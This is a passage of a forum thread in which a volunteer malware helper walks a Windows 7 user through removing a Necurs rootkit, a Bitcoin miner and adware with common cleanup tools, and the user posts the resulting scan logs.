    <Data>behavior:_pid:3476:94227975697806;process:_pid:3476,ProcessStart:131481583170419838</Data>
    <Data>0</Data>
    <Data>%%844</Data>
    <Data>3</Data>
    <Data>%%848</Data>
    <Data>0</Data>
    <Data>%%822</Data>
    <Data>0</Data>
    <Data>9</Data>
    <Data>%%887</Data>
    <Data>
    </Data>
    <Data>0x00000000</Data>
    <Data>Der Vorgang wurde erfolgreich beendet. </Data>
    <Data>
    </Data>
    <Data>0</Data>
    <Data>0</Data>
    <Data>No additional actions required</Data>
    <Data>
    </Data>
    <Data>
    </Data>
    <Data>AV: 1.251.70.0, AS: 1.251.70.0, NIS: 117.8.0.0</Data>
    <Data>AM: 1.1.14104.0, NIS: 2.1.13804.0</Data>
  </EventData>
</Event>



#5 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,670 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:06 AM

Posted 25 August 2017 - 03:28 PM

Alright, let's see if RogueKiller can deal with it :)
  • Download RogueKiller (x64) and save it on your desktop.
  • Exit all running applications.
  • Double-click on RogueKillerX64.exe to launch the tool. On its first execution, RogueKiller will disply the software license (EULA), click on "Accept" to continue.
  • If RogueKiller is unable to load, do not hesitate to try launching it several times or rename it winlogon.
  • Click "Start Scan" to begin the analysis. This may take some time.
  • Once the scan is complete, click the "Open TXT" button to display the scan report.
  • Copy/Paste it's content in your next reply.
Note : A "Premium" version of the tool is available, but the free version provides everything you need to clean your machine.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#6 Schub

Schub
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 26 August 2017 - 01:36 AM

Ok, done

 

RogueKiller V12.11.11.0 (x64) [Aug 21 2017] (Free) von Adlice Software
Mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Betriebssystem : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Gestartet in : Normalmodus
User : a_omuell [Administrator]
Gestartet von : C:\Program Files\RogueKiller\RogueKiller64.exe
Modus : Scannen -- Datum : 08/26/2017 07:58:17 (Dauer : 00:29:04)
Switches : -refid

¤¤¤ Prozesse : 0 ¤¤¤

¤¤¤ Registry : 9 ¤¤¤
[PUP] (X64) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\OCS -> Gefunden
[PUP] (X86) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\OCS -> Gefunden
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA} -> Gefunden
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\b2ceb703d2f8dd8 (\SystemRoot\System32\Drivers\b2ceb703d2f8dd8.sys) -> Gefunden
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\syshost32 ("C:\Windows\Installer\{6C72F8FA-6B0E-2807-8D3A-77486CA33D34}\syshost.exe" /service) -> Gefunden
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\b2ceb703d2f8dd8 (\SystemRoot\System32\Drivers\b2ceb703d2f8dd8.sys) -> Gefunden
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\syshost32 ("C:\Windows\Installer\{6C72F8FA-6B0E-2807-8D3A-77486CA33D34}\syshost.exe" /service) -> Gefunden
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Gefunden
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Gefunden

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Dateien : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts-Datei : 0 ¤¤¤

¤¤¤ Anti-Rootkit : 0 (Driver: Geladen) ¤¤¤

¤¤¤ Webbrowser : 0 ¤¤¤

¤¤¤ MBR-Übeprüfung : ¤¤¤
+++++ PhysicalDrive0: Hitachi HTS545050B9A300 +++++
--- User ---
[MBR] 66c67bccb062319325f8bdfa145894e0
[BSP] 40d9e0ce06d413969015ab16756352ec : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 14336 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 29362176 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 29566976 | Size: 462502 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

 

.
 



#7 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,670 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:06 AM

Posted 27 August 2017 - 02:02 PM

Good :)

You can run RogueKiller again, but this time, check every entries afterwards and click on the Remove selected. Once done, click on the Open Report button and copy/paste its content here.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#8 Schub

Schub
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 27 August 2017 - 02:54 PM

Hello,

 

RogueKiller V12.11.11.0 (x64) [Aug 21 2017] (Free) von Adlice Software
Mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Betriebssystem : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Gestartet in : Normalmodus
User : a_omuell [Administrator]
Gestartet von : C:\Program Files\RogueKiller\RogueKiller64.exe
Modus : Löschen -- Datum : 08/27/2017 21:14:17 (Dauer : 00:34:36)

¤¤¤ Prozesse : 0 ¤¤¤

¤¤¤ Registry : 9 ¤¤¤
[PUP] (X64) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\OCS -> Gelöscht
[PUP] (X86) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\OCS -> Gelöscht
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA} -> Gelöscht
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\b2ceb703d2f8dd8 (\SystemRoot\System32\Drivers\b2ceb703d2f8dd8.sys) -> Gelöscht
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\syshost32 ("C:\Windows\Installer\{6C72F8FA-6B0E-2807-8D3A-77486CA33D34}\syshost.exe" /service) -> Gelöscht
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\b2ceb703d2f8dd8 (\SystemRoot\System32\Drivers\b2ceb703d2f8dd8.sys) -> Gelöscht
[Root.Necurs] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\syshost32 ("C:\Windows\Installer\{6C72F8FA-6B0E-2807-8D3A-77486CA33D34}\syshost.exe" /service) -> Gelöscht
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Ersetzt (http://search.msn.com/spbasic.htm)
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4004736709-471984187-2621406794-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Ersetzt (http://search.msn.com/spbasic.htm)

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Dateien : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts-Datei : 0 ¤¤¤

¤¤¤ Anti-Rootkit : 0 (Driver: Geladen) ¤¤¤

¤¤¤ Webbrowser : 0 ¤¤¤

¤¤¤ MBR-Übeprüfung : ¤¤¤
+++++ PhysicalDrive0: Hitachi HTS545050B9A300 +++++
--- User ---
[MBR] 66c67bccb062319325f8bdfa145894e0
[BSP] 40d9e0ce06d413969015ab16756352ec : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 14336 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 29362176 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 29566976 | Size: 462502 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK



#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,670 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:06 AM

Posted 27 August 2017 - 09:14 PM

Good :) Now let's see if Malwarebytes detects anything.

j1Bynr2.pngMalwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run, the time required to complete the scan depends of your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#10 Schub

Schub
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 28 August 2017 - 11:16 AM

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 8/28/17
Scan Time: 3:49 PM
Log File: c700823b-8bf7-11e7-b763-60eb69877a5b.json
Administrator: Yes

-Software Information-
Version: 3.2.2.2018
Components Version: 1.0.186
Update Package Version: 1.0.2673
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Sandburg9\a_omuell

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 314306
Threats Detected: 23
Threats Quarantined: 23
Time Elapsed: 21 min, 19 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 10
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0247DDA6-66A8-4ABB-9768-71796027B405}, Delete-on-Reboot, [458], [417157],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11FD25BC-02EC-4C04-998E-6A2744F45961}, Delete-on-Reboot, [458], [417157],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{95E34C51-2FE4-4682-99B6-400BBF6BDCCF}, Delete-on-Reboot, [458], [417161],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{ADD7EAEC-7E96-4357-9D15-CBE3E01E5905}, Delete-on-Reboot, [458], [396875],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EA6BB3C4-639B-4FAF-8E78-36BA9DB4971C}, Delete-on-Reboot, [458], [417157],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa, Delete-on-Reboot, [458], [396876],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, Delete-on-Reboot, [458], [417158],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, Delete-on-Reboot, [458], [417158],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa3, Delete-on-Reboot, [458], [417158],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, Delete-on-Reboot, [458], [417162],1.0.2673

Registry Value: 7
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0247DDA6-66A8-4ABB-9768-71796027B405}|PATH, Delete-on-Reboot, [458], [417157],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11FD25BC-02EC-4C04-998E-6A2744F45961}|PATH, Delete-on-Reboot, [458], [417157],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{95E34C51-2FE4-4682-99B6-400BBF6BDCCF}|PATH, Delete-on-Reboot, [458], [417161],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{ADD7EAEC-7E96-4357-9D15-CBE3E01E5905}|PATH, Delete-on-Reboot, [458], [396875],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EA6BB3C4-639B-4FAF-8E78-36BA9DB4971C}|PATH, Delete-on-Reboot, [458], [417157],1.0.2673
Backdoor.ForShare, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Delete-on-Reboot, [8617], [400293],1.0.2673
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START1, Delete-on-Reboot, [458], [396503],1.0.2673

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 6
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, Delete-on-Reboot, [458], [417164],1.0.2673
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\Mysa1, Delete-on-Reboot, [458], [417159],1.0.2673
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\Mysa2, Delete-on-Reboot, [458], [417159],1.0.2673
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\Mysa3, Delete-on-Reboot, [458], [417159],1.0.2673
Trojan.BitCoinMiner, C:\WINDOWS\HELP\LSMOSEE.EXE, Delete-on-Reboot, [78], [422284],1.0.2673
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\MYSA, Delete-on-Reboot, [458], [396877],1.0.2673

Physical Sector: 0
(No malicious items detected)

(end)



#11 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,670 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:06 AM

Posted 28 August 2017 - 11:54 AM

Good :) And now let's do a sweep with AdwCleaner and JRT.

zcMPezJ.pngAdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop
  • Right-click on AdwCleaner.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the EULA (I accept), then click on Scan
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Clean button. This will kill all active processes
    V7SD4El.png
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply
iT103hr.pngJunkware Removal Tool (JRT)
  • Download Junkware Removal Tool (JRT) and move it to your Desktop
  • Right-click on JRT.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Press on any key to launch the scan and let it complete
    tLsXbWy.png
    Credits : BleepingComputer.com
  • Once the scan is complete, a log will open. Please copy/paste the content of the output log in your next reply
Your next reply(ies) should therefore contain:
  • Copy/pasted AdwCleaner clean log
  • Copy/pasted JRT log

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#12 Schub

Schub
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 28 August 2017 - 01:58 PM

# AdwCleaner 7.0.1.0 - Logfile created on Mon Aug 28 18:39:10 2017
# Updated on 2017/05/08 by Malwarebytes
# Running on Windows 7 Home Premium (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

No malicious folders deleted.

***** [ Files ] *****

No malicious files deleted.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\BHO.DLL

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries deleted.

*************************

::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0

 

*************************

C:/AdwCleaner/AdwCleaner[S0].txt - [982 B] - [2017/8/28 18:35:1]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 7 Home Premium x64
Ran by a_omuell (Administrator) on 28.08.2017 at 20:47:18,10
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

File System: 17

Successfully deleted: C:\Windows\wininit.ini (File)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0K01R0KG (Temporary Internet Files Folder)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0RAMMW22 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62AXOPQ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6425D9ON (Temporary Internet Files Folder)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZG8CKJ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LIXMVQOA (Temporary Internet Files Folder)
Successfully deleted: C:\Users\a_omuell\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W0WK2U1P (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0K01R0KG (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0RAMMW22 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62AXOPQ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6425D9ON (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZG8CKJ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LIXMVQOA (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W0WK2U1P (Temporary Internet Files Folder)

Deleted the following from C:\Users\a_omuell\AppData\Roaming\Mozilla\Firefox\Profiles\lpv20eh8.default\prefs.js
user_pref(browser.urlbar.suggest.searches, false);

 

Registry: 2

Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{8FF5E180-ABDE-46EB-B09E-D2AAB95CABE3} (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 28.08.2017 at 20:49:50,22
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#13 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,670 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:06 AM

Posted 28 August 2017 - 02:09 PM

Good :) Last but not least, let's run a scan with FRST to see what's left to remove.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds
  • Click on the Scan button
  • On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#14 Schub

Schub
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 28 August 2017 - 03:21 PM

Here it is.

 

LastRegBack: 2017-08-27 08:59

 

 

 

 

==================== Ende von FRST.txt ============================

 

 

 

 

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-08-2017
durchgeführt von a_omuell (28-08-2017 22:11:59)
Gestartet von C:\Users\a_omuell\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2011-01-05 17:46:29)
Start-Modus: Normal
==========================================================

 

==================== Konten: =============================

Administrator (S-1-5-21-4004736709-471984187-2621406794-500 - Administrator - Disabled)
a_omuell (S-1-5-21-4004736709-471984187-2621406794-1000 - Administrator - Enabled) => C:\Users\a_omuell
Gast (S-1-5-21-4004736709-471984187-2621406794-501 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 9.20 (HKLM-x32\...\7-Zip) (Version:  - )
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Acer Arcade Deluxe (HKLM-x32\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 4.0.8012 - CyberLink Corp.) Hidden
Acer Arcade Deluxe (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 4.0.8012 - CyberLink Corp.)
Acer Arcade Movie (HKLM-x32\...\{B906C11A-D193-4143-9FA7-E2EE8A5A8F21}) (Version: 9.0.6625 - CyberLink Corp.) Hidden
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.68 - NewTech Infosystems)
Acer Crystal Eye Webcam (HKLM-x32\...\{7760D94E-B1B5-40A0-9AA0-ABF942108755}) (Version: 5.2.19.3 - Suyin Optronics Corp)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3013 - Acer Incorporated)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.01.3003 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.03.3003 - Acer Incorporated)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0804.2010 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\{E5EABF66-F9C4-430C-B97D-3CF28A58D50B}) (Version: 1.3.17.05006 - Alcor Micro Corp.) Hidden
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{E5EABF66-F9C4-430C-B97D-3CF28A58D50B}) (Version: 1.3.17.05006 - Alcor Micro Corp.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.33 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{B36047D4-E932-C4B2-0DF2-94C8577468A9}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Backup Manager Basic (HKLM-x32\...\{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.68 - NewTech Infosystems) Hidden
ccc-core-static (HKLM-x32\...\{7225AFBA-5C8D-90EB-B768-8B10EC636757}) (Version: 2010.0605.2309.39762 - Ihr Firmenname) Hidden
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM-x32\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{8E5233E1-7495-44FB-8DEB-4BE906D59619}) (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.14 - Acer Inc.)
Malwarebytes version 3.2.2.2018 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.2.2.2018 - Malwarebytes)
MediaShow Espresso (HKLM-x32\...\{4968622A-4D3F-489E-9ACE-5FEC4CC0BDE3}) (Version: 5.5.1403_23691 - CyberLink Corp.) Hidden
Micrografx Picture Publisher 10 (HKLM-x32\...\{04AABF6D-55C5-4779-ABF9-992016E913A2}) (Version: 1.0.0.0 - Micrografx, Inc.)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
